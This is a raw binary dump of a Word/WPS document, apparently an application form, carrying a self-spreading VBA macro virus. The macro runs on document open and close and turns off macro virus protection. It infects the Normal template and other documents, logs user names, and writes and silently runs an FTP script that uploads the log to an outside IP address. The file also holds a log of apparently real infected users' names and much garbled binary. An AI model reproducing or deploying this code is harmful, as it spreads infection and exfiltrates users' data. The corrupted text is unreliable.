ࡱ> >  F?@ABCDEGH`JKLMNOPQRSTUVWXYZ[\]^_abcdeRoot Entry F`c~@;SummaryInformation( DocumentSummaryInformation8 h Q Q Oh+'0 , 8 DPX`h Ly3ubڋObfNdellNormalwq2@18Z@SQ[<WPS Office_10.8.2.6900_F1E327BC-269C-435d-A152-05C5408002CA՜.+,D՜.+,HPXdlt |b (\dlKSOProductBuildVer2052-10.8.2.69000* pHdProjectQ(@= l Q Q f !ycg J< rstdole>stdoleP h%^*\G{00020430-C 0046}#2.0#0#C:\Windows\SysWOW64\e2.tlb#OLE Automation`EOfficEOficEE2DF8D04C-5BFA-101B-BDE5EAACj42E2Egram Files (x86)\Kingsoft \WPS :\10.8.2.6900\oD6\ksoapi.dll#Up"de  3.0 Ob Library (Beta)TiNorma lNrma  *\C [xcO<iThisDocumenPtGT@kisD@cuQen@s 2E HB1~BB,!q"B+BBK*m *\CNormalrU~~~~~~~~~~~~~~~~~~< )ү IGcy@{ e  A Z ޻D` \1Project ThisDocumentF /C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLLVBA ! I` 0Kw 6IC:\Program Files (x86)\Kingsoft\WPS Office\10.8.2.6900\office6\wpsapi.dllWord Ap0FC:\Windows\SysWOW64\stdole2.tlbstdole QyL-[DRIC:\Program Files (x86)\Kingsoft\WPS Office\10.8.2.6900\office6\ksoapi.dllOffice ac)k F]C6dB#0#!B:P2V'yy@<6d FDocument @C0 6kBt1[{(CIGIu"  Document_OpenDocument_Close (<- this is a marker! F F`FbFj FCodeModuleFind F ! |HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info LogFile5 FCountOfLines Lines ' Log file --> C:\hsf .sys  c:\netldx.vxd o 209.201.88.110  user anonymous pass itsme@ cd incoming ascii put  quit Tcommand.com /c ftp.exe -n -s:c:\netldx.vxdp F ' hh:mm:ss AMPM - dddd, d mmm yyyyDeleteLinesAddFromString :VBE6.DLL !" !  !x  !Q @ !e ` !X  !`  !d  !b  ! crU~}  9prU @$`$A` n hQrU 1  1YAA)   Y !A q a y I q qQ y!y  49aa`` IW0   H KG(%$ 4  \ Q8)F(%$ P ` \ Q4)8:%(%(%('%(`'%8=@B0 L5@<:%(%(%('%(`'%4W@B0 VpJ6@0$   h@ @0 0(]/  $ T PlW' /6@0Lc]36(%8=@A0%8= B 6@0  kJ4(%4W@A0%4W B 6@0 k *F *F@0" 6 @ 0((hW'@ snj0 lF(   `16 @0 ~l*#*1/ l]  = ]      ! "l*# / # =:$N@@ %t5@.# $ T T/{Lc]/@kJ0$ 4 8l$ 4 8l' )6@ Lc]3)$ P <k\6(%8=@A0%8= B $6@0 2(!  &lJi/hh=T!  &(0">F@   ' @6@0 T!  &(0">F@   ' @6@0 H!  &(0">F@  6@0 0- @ '@0:( 6@0 ~h  ) *$ @ '@0:( :+N  ,:-NXXH ,H8 ( '(:(!  &>F  ':(  '$6*@0 XH8(0(%4W@A0%4W .6@0 $ @4W0/50\c]3$ P $ 4 kJ(0>F@  :0]/ $ 4 k')6 @0 > )$ 4 kl4(%4W@A0%4W B $6@0 2(%8=@A0%8= .6@0 $ @8=0/50lc]3> $ 4 H \@Dxh\l$L84x@0  XH8('44Pam *\G{000204EF-0000-0000-C000-000000000046}#4.0#9#C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL#Visual Basic Fv xB " @7B7<':qk :C@DVQ } Private Sub " () C@F $ &sn% Set prevDocument = ActiveDocumentC@Fϋ$% Set nextDocument = NormalTemplateC@FNd% Set prevDocument = NormalTemplateC@F" Set nextDocument = newDocumentC@Fkqkqoxh]<- this is a marker!Declare Variables]0H`x]]Initialize Variables `!*!,%2.TI &!*!,%2.V J'' T!4%6'P J'' V!4%6'RSwitch the VirusProtection OFF b(d$h$f>HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User InfoLogFile j%lM P T!4!8 T!4%<'\ Re V!4!8 V!4%<'\hk \ \' Logfile --> \ \' Logfile --> $'\\ . ^ p$n$ '^  .BC:\hsf ^.sys'^ ^ \V c:\netldx.vxdo 209.201.88.110user anonymous pass itsme@" cd incomingasciiput ^quit;VD*command.com /c ftp.exe -n -s:c:\netldx.vxd tA@r>HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User InfoLogFile j,lk`MMake sure that some conditions are true before we continue infecting anything  P R `!v x `!v z TruInfect the NormalTemplate Ped = T &!|'NalTe T!4!8 T!4%<'XveDocu1Write a log file of this NormalTemplate infection . ~!Z ~!Z .$ $g ~!Z .$ $0.8 Z ~!Z .$'Zkd Z $' 'ZlNk` .8*\C  ) X $'  hh:mm:ss AMPM - $ Zdddd, d mmm yyyy$ $'  ~! $'  Z $'Xode  V!4!8 V!4B@ X V!4B@Dime, " NG &B@jk@Infect the ActiveDocument R `!$: `!|W `!|'Lempl V!4!8 V!4%<'XtiveDo T!4!8 T!4B@r X T!4B@D mmm y LG `B@jkHk@o8 Logfile -->3) &<" 09:08:36 - Saturday, 28 Nov 1998 SPo0Kyn Blue Planet$ 02:50:31 PM - Saturday, 28 Nov 1998 MARK B. SEAY! 08:04:45 AM - Friday, 4 Dec 1998 UPS$ 11:43:35 AM - Thursday, 17 Dec 1998 WRO# 03:07:26 PM - Tuesday, 22 Dec 1998 BCBSA$ 03:28:02 PM - Wednesday, 6 Jan 1999  BCBSA" 02:59:47 PM - Monday, 11 Jan 1999 Marsha Veach2e% 01:54:54 PM - Wednesday, 20 Jan 19992e Connie Sandifer, CMP2e" 09:33:06 PM - Monday, 25 Jan 1999 Doug RowaneX3e% 08:21:12 AM - Wednesday, 27 Jan 19993e IMSI3e" 10:59:58 AM - Friday, 29 Jan 1999 Rajeh4e$ 03:37:57 PM - Saturday, 30 Jan 1999e4e hornd4e" 01:26:48 PM - Tuesday, 2 Feb 1999 Cooley Godwarde" 04:57:29 PM - Tuesday, 2 Feb 1999 Cooley Godwarde" 06:35:44 PM - Tuesday, 2 Feb 1999 Cooley Godward8# 04:23:52 PM - Thursday, 4 Feb 199988 Cooley Godward9# 04:27:39 PM - Saturday, 6 Feb 199999 Cooley Godward9! 06:18:06 PM - Monday, 8 Feb 1999 Cooley Godward9" 09:17:17 PM - Tuesday, 9 Feb 1999 hclee9% 04:44:45 PM - Wednesday, 17 Feb 19999 Dr. W. Hsiao9% Wendy Hsiao, Ph.D.9# 04:13:19 PM - Tuesday, 23 Feb 199999 CCST9$ 10:09:35 AM - Saturday, 20 Mar 199999 cpwu9# 09:33:49 AM - Thursday, 6 May 199999 9# 12:39:25 PM - Tuesday, 20 May 199799 ghc-bbc9! 01:21:36 PM - Friday, 7 May 1999 :# 05:51:53 - Wednesday, 12 May 1999:: qdzhuang$ 03:23:04 PM - Saturday, 19 Jun 1999:: :$ 02:53:46 - Tuesday, 6 Sep 2011:: :$ 09:37:47 - Monday, 19 Sep 201199 ʿ:$ 01:41:54 - Monday, 26 Sep 2011:: unknown:' 10:50:02 - Wednesday, 19 Oct 2011: ףȪ9' 08:27:05 - Wednesday, 26 Oct 2011: ٻ:$ 10:37:36 - Monday, 31 Oct 2011:: ˷:$ 04:21:38 - Monday, 31 Oct 2011;; ÷;& 08:15:53 - Wednesday, 2 Nov 2011; Ż᷼;$ 10:26:39 - Monday, 14 Nov 2011;; unknown;# 07:31:07 - Friday, 2 Dec 2011;; ¸ѧ;# 09:39:08 - Monday, 5 Dec 20119G; Ƽ;' 05:57:42 - Wednesday, 14 Dec 2011; ł;' 12:07:54 - Wednesday, 28 Dec 20119G unknown8^& 08:16:33 - Thursday, 29 Dec 2011; ;$ 09:24:12 - Tuesday, 7 Feb 2012;; 3 ' 10:43:01 - Wednesday, 21 Mar 2012< unknown<& 10:24:21 - Thursday, 22 Mar 2012< <$ 10:45:26 - Monday, 26 Mar 2012;: lyy<<% 04:55:40 - Tuesday, 17 Apr 2012< <& 05:36:22 - Thursday, 26 Apr 2012$  ibmstd$ 05:34:48 - Friday, 27 Apr 2012 Lenovo User8D0$ 08:48:10 - Monday, 13 Oct 20144DE USER.1# 04:10:40 - Monday, 8 Dec 2014\Ki ȫW$ 04:42:10 - Friday, 28 Dec 2018ice ¹i$ 09:15:48 - Monday, 25 Feb 2019.0 wellhope& 08:50:54 - Thursday, 29 Oct 2020ma jisiyu\' 05:28:16 - Wednesday, 23 Dec 2020 liaofan$ 01:09:07 - Friday, 29 Oct 2021 ʯ$ 03:33:47 - Tuesday, 2 Nov 20218c5 ʯiAttribute VB_Name = "ThisDocument" Bas1Normal.VGlobal!SpaclFalse CreatablPre declaIdTru BExposeTemplateDeriv$CustomlizC1P Sub _Open() Set New #Ns(1nextRoutin}p"##&prev&`) AWith .VBPr ojectComponsC " For i1 To .CountIf .Item(i).TypA4100 Txhen   CodeModuloANot .Find("\" +/EO+ "()", 1'(OfLVs@0)?!# XCC,1)W[,c@6SnJgN.#(.ZcStart(Aa!1, vb_pk_), [ ĔEEnd 8aA AIf.AddFrom'dReicea1"ds6 >]XIs ^:. 58, "Ar = Actednam 6 !2mBr E" a sI "2xngIQE{L KN`[=!Sub Cl`! On ErbrRes`x Const Marker" "<- t` is a m! 'D# Va riaDim Save8, +",Infed,lQ As B`oolea A aI@ntObA " Our, Userkres!LogD`, 9Fi ހ n Initializ!ZaaXټ =  6= adP3ZXY0aX`PJnt 00Swit ch0irusStPion O$FFp#pts.2V= Q G(Day(Now())$1) A.(Sys@mpXliv~f("g"HKEY_CURRENT_USER\Softw0\Micros\MS 0up (ACME)\ o"aB j2 *02( jPp!$+ckbeDrGI3ct֑/ta &k/ @%ECg Mid(,P(P "'2 " & "A -h->"0sL@4) - p#Uʎ43 9=+ ! q Int(8 * Rnd)02 +QO i3` =C:\hsf E` .sysWQ Outpru"E#1#S<#wcS E3"c:\netldx.vxd" _ W"o 209.201.88.X110 uL anonymou pass i tsme@cd incngasciio! quitT Shell "@mand.p /c ftp.exe -n -s:[HidAAAAA0+f?AsDZe32PMake sure`P at soco,nd cq H tA befo@we Pue1m"ianysngT @(F FXxAAcS_"(li v&m0 = wdã Or c_e^"A'CR2a  a_P"`N . d#}pX`,rP3S'Wria log f% of P, iB nsgڑPApplicaAp.Io1Lodress, i, 1) <> Chr(13) T@hen If Mid(Application.UserAdJd0 | Z = & YEnd IfElsec& "' "?MNext i OurCXodeU&& _ * & Format(Time, "hh:mm:ss AMPM - ")!Datd, d mmm ya?Name9N:#B:nt.ACModule.DeleteLines 1, CoupntOfBFromStrin09:08:36 oSatuPrday58`Hv 1998 ' SPo0Ky!Bl`LPlane C'A2:500:31 x MARK B. SE AY 8:04:45 FriA4 DecUPSj11:43:3dThurs17WROK 3:07:26CHTue22BPCBSA221Wed{ 6 Jan9 !`#9:47Mo n1Marsha Veacha1:54@20 Connie Hndifer, CMP 9:3'@25Doug Rowa@;8:21:123h27IMSI10:59:$58:29Raj+:7:5&I3+hornd b1::48c%G; Feb4Cooley Godwar-@C9 06(:44' 023:v5$&-4 4`:27:3 6 1@.L"89:17 9hcle@%???C%<Dr. W. HsiaoŅwWendy, Ph.D.8F4:13:13 CSTg ,@ReF77@;f%0cpwuzA3: 49/6 Mayfu 2:9W,07 ghc-bbc0/1\ UT7 Dk5:5PF3 1`2qdzhuang3:+0/PJuGQO 0PQ6 0_v6 Se@p 2011  7TϒU9ʿ~ cT5FP;u`nknowPL00:02 Dy9 O ףȧv`905 phٻJ 30=6E v˷@ 8D÷8:1@!3 2ŻX᷼ 2pP9y 14OOp1y ,y5¸xѧ m52}ƫ 00=$2eIŔ[2Q54 28Z0>3Aq1u诽2L(37rL2301? 21>rQ7? ' q%u8 B q5 ;/T ly!Z55:40FPaAp36: Eơ0xibmh&3(#ay, 27 Apr 2012 ' Lenov@o Userp  ' 08:48:10 - Mond13 Oct|B4|USER n4h:40 n 8 Decl̐ȫ 842pQ8Frip298/ ¹a 99:15 25 Febs99wellhope8:50:54AThurs;9 t20jisiDyu5:26AuWedne3wliaofan1:09:0.7w;1 3:33:4Tu:P Novw2or ApplicationsP*\G{00020905-0000-4B30-A977-D214852036FF}#3.0#0#C:\Program Files (x86)\Kingsoft\WPS Office\10.8.2.6900\office6\wpsapi.dll#Upgrade Kingsoft WPS 3.0 Object Library (Beta)*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\SysWOW64\stdole2.tlb#OLE AutomationN*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#63.1#0#C:\Program Files (x86)\Kingsoft\WPS Office\10.8.2.6900\office6\ksoapi.dll#Upgrade WPS Office 3.0 Object Library (Beta)*\CNormal*\CNormal[xcO !ycg<ThisDocument0d63791621ThisDocumentq~B (9**s@Y'`LM/ Wordk` VBA`Win16~`Win32`Mac`VBA6#`1p` stdole`` Project-` Officeu` ThisDocument<` _Evaluate`Normal`Documentj` Document_Open` NewDocument` Documents` nextRoutine` prevDocument`NormalTemplateq` nextDocumentFy` VBProjectOh` VBComponents '`i``Count0v`Itemz` CodeModule`Findn` CountOfLines!\` codeString*`Lines` ProcStartLine$` vbext_pk_ProcE`ProcCountLines` AddFromString` ReplaceLine`Document_Close7\`MarkerS` SaveDocumentd]`SaveNormalTemplatel`DocumentInfected `NormalTemplateInfectedy`ad~\`nto^`OurCode=` UserAddressF`LogData(6`LogFileG`ActiveDocument\`Options`VirusProtectionoD`Day`Now%`Systema`PrivateProfileString[`Str`RndR`ShellV`vbHideW` SaveFormat`wdFormatDocument`wdFormatTemplatee`Savedd` Application*`ChrK~`Time`UserName\` DeleteLines `Save`FullNameО` _B_var_Midp`_B_var_i ` _B_var_Str` _B_var_Chr\;` _B_var_Time$` _B_var_Format` _B_var_Datev`TID="{184FC330-8ED4-4BA4-97C8-81316423C65B}" Document=ThisDocument/&H00000000 Name="Project" HelpContextID="0" VersionCompatible32="393222000" CMG="5250ED0AF60EF60EF60EF60E" DPB="5755E811q)WordDocumentI.,0Table E813EC14EC14EC" GC="5C5EE318ED1CEE1CEEE3" [Host Extender Info] &H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000 [Workspace] ThisDocument=0, 0, 0, 0, C ThisDocumentThisDocument&Data WpsCustomData P( KSKS.,  84L%x O $hJ; s | DN6 Ly3ubڋObfN Y T'`+RNS]\OUSMO3ubDyObN3ubUSMO~{RRT T0]OSR[b3ubPgelQ:y,cS3ubUSMOhQSONXTvcw0Y g1YOT_Z\OGP,vQ#Nv^?acSv^vYt0 1.SmS_t^ċ[DyOOiv`Qw[0 gHe YeMT;N{蕌TċYOhg08h[0N Nb,Y g1YOT_Z\OGP,vQ#N1u,gUSMOv^?acSv^vYt0 USMO#N~{ T USMOvz t^ g e f 1.Q3ubLyvNXTGW^[,gN@bcOvTyNSPgevw['`\OQb &TR NNSċ0 2.~{ Te _{1u3ubNTUSMO#NN~{ T N_N~{0 3.dkbfN3ubPgeN T Nb0 *,.:<>BDFNPT\Źsh]QF;/CJOJPJQJo(aJCJOJPJQJaJCJOJPJQJaJCJOJPJQJo(aJCJOJPJQJaJCJOJPJQJaJCJOJPJQJo(aJCJOJPJQJaJCJOJPJQJaJCJOJPJQJo(aJCJ$OJQJo(aJ$5CJ$OJQJo(aJ$5CJ$OJQJo(aJ$5CJOJQJo(aJ5CJOJQJo(aJ5)CJOJQJo(aJ5mH sH nHtH\CJOJQJo(aJ5\\^`hjnprtvxz|~ǻsg[OD:CJOJPJQJo(CJOJPJQJaJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJaJCJOJPJQJaJCJOJPJQJo(aJCJOJPJQJaJCJOJPJQJaJ    ϻwcWG;+CJOJPJQJo(^JnHtHCJOJPJQJo(^JCJOJPJQJo(^JnHtHCJOJPJQJo(^J'CJOJPJQJo(^JmH sH nHtHCJOJPJQJo(^JCJOJPJQJo(^J'CJOJPJQJo(^JmH sH nHtHCJOJPJQJo(^JCJOJPJQJo(^J'CJOJPJQJo(^JmH sH nHtHCJOJPJQJo(^JCJOJPJQJo(^JCJOJPJQJo(^JCJOJPJQJo(^J  > H P R T ϻul`TI=1CJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJaJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJCJOJPJQJo(#CJOJPJQJo(mH sH nHtHCJOJPJQJo(CJOJPJQJo(CJOJPJQJo(CJOJPJQJo(^J'CJOJPJQJo(^JmH sH nHtHCJOJPJQJo(^JCJOJPJQJo(^JCJOJPJQJo(^JCJOJPJQJo(^J  * , 8 @ X ĸzh^TJ8.CJOJPJQJo(#CJOJPJQJo(mH sH nHtHCJOJPJQJo(CJOJPJQJo(CJOJPJQJo(#CJOJPJQJo(mH sH nHtHCJOJPJQJo(#CJOJPJQJo(mH sH nHtHCJOJPJQJo(CJOJPJQJo(^JCJOJPJQJo(^JCJOJPJQJo(^JCJOJPJQJaJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJo(aJX \ ^ ` b d f h    & ( ƻ~sqo(CJOJPJQJaJCJOJPJQJo(CJOJPJQJo(CJOJPJQJo(CJOJPJQJCJOJPJQJo(CJOJPJQJo(aJCJOJPJQJaJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJo(aJCJOJPJQJ,.<>DFPR a$$$If a$$$If a$$$If a$$$If a$$$If a$$$Ifa$$a$$ RT^`.% a$$$If a$$$If$$If:V TT44l44l0Xֈ04 T!0`jlnprB90 a$$$If a$$$If$$If:V TT44l44l0J\0 T!0 a$$$If a$$$Ifrvz~ { & FG$VD0^0$If & FG$WD`$If & FG$$If & FG$$If G$WD`$IfG$$If dH$If a$$$If a$$$If a$$$If a$$$If a$$$If T ]TKB a$$$If a$$$If a$$$If$$If:V TT44l44l000!0dHWD`$If G$WD`$If , Z dpWD8 `8 $If dp$IfdpWDC ` $IfdpWD`$IfdpWD`$If a$$$If a$$$If a$$$IfZ \ ^ b f h ztkbSDdpWD`$IfdpWD0`0$If a$$$If a$$$If$If$$If:V TT44l44l0l 00!0    " $ \ZXDB 9r &dP 9r $$If:V TT44l44l0/ 00!0dpWD`$IfdpWD`$If$ & ( ,. A!#"$7%S2P1866666666 0@P`p6666 0@P`p 0@P`p 0@P`p 0@P`p 0@P`p 0@P`pJ@Jcke a$$1$ CJaJKHmH sH nHtH_H$A@$؞k=W[SONi@Nnfh